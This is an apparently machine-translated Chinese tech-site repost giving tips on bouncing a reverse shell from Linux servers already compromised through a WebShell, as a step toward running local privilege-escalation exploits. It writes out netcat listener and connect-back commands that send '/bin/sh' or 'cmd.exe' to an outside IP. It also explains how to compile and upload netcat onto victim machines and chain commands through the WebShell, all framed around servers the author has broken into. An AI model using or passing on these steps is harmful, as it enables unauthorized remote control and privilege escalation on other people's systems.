Shulou(Shulou.com)06/01 Report--

This article mainly shows you "what are the tips for rebounding CmdLine Shell under Linux", the content is simple and clear, and I hope it can help you solve your doubts. Let me lead you to study and learn this article "what are the tips for rebounding CmdLine Shell under Linux".

Most of the rights of Linux are raised by Local Exploit. WebShell can generally execute commands, but our EXP must be run in an interactive environment, otherwise if it is executed directly in WebShell, we will not be able to take advantage of it even if the authorization is successful. So we need to bounce a CmdLine Shell back first (to put it bluntly, CmdShell is afraid of misunderstanding. Because Win has a cmd.exe ^ _ ^), then execute EXP under the command line terminal to lift the rights.

In general, most people will bounce back a Shell through the Back Connect feature of PHP WebShell, but sometimes they encounter situations where the server does not support PHP or WebShell cannot rebound. For example, a JSPShell server that my friend gave me these two days only supports JSP, not PHP. At this point, our classic netcat can come in handy.

When we usually work under Windows, if necessary, we can first run nc-vv-lp 1234 listening port on the local machine, and then nc 12.21.12.21 1234-e cmd.exe on broilers to bounce back a CmdShell. This method is still feasible in Linux.

After listening on the local machine, run nc 12.21.12.21 1234-e / bin/sh in WebShell and you can play a CmdLine Shell to us.

But the situations we often encounter are not all 100% smooth, like the two that we finished last night, each of which can not directly implement nc. One has nc, but the execution never works, and the other has no nc.... at all.

However, this is not difficult for us, we can install one for him, a faster way is that we can go to http://netcat.sourceforge.net/download.php to download the source code of nc, first compile on our own linux machine and upload the bin file (I started to upload the netcat that comes with my Debian, but it still won't run. If not, upload the source code and compile it directly on the target machine.

Of the two machines last night, one was compiled locally by me directly, and the other was compiled on the target machine. It's easier to say if the direct nc can be run. If you need to compile on the target machine, here are some tips:

Because before we get the CmdLine Shell, we can only execute commands in WebShell, usually one at a time, and then wait for the echo. If our WebShell is in the / var/www/site directory, then every time we execute the command, the default current path is / var/www/site, and our netcat source package is unzipped in the / tmp/netcatsrc folder, so that when we compile netcat, configure is OK to use the / tmp/netcatsrc/configure command, but not the next make, because the current path is / var/www/site Not the / tmp/netcatsrc/, we want, so we will report an error when we configure the make.

To solve this problem is actually very simple, you can directly write two sentences into one: cd / tmp/netcatsrc;make

Separate the make with semicolons and follow the directory switch command so that you don't make an error when compiling.

This is a useful way to write a CmdLine Shell before you get it.

These are all the contents of this article entitled "what are the tips for bouncing CmdLine Shell under Linux?" Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.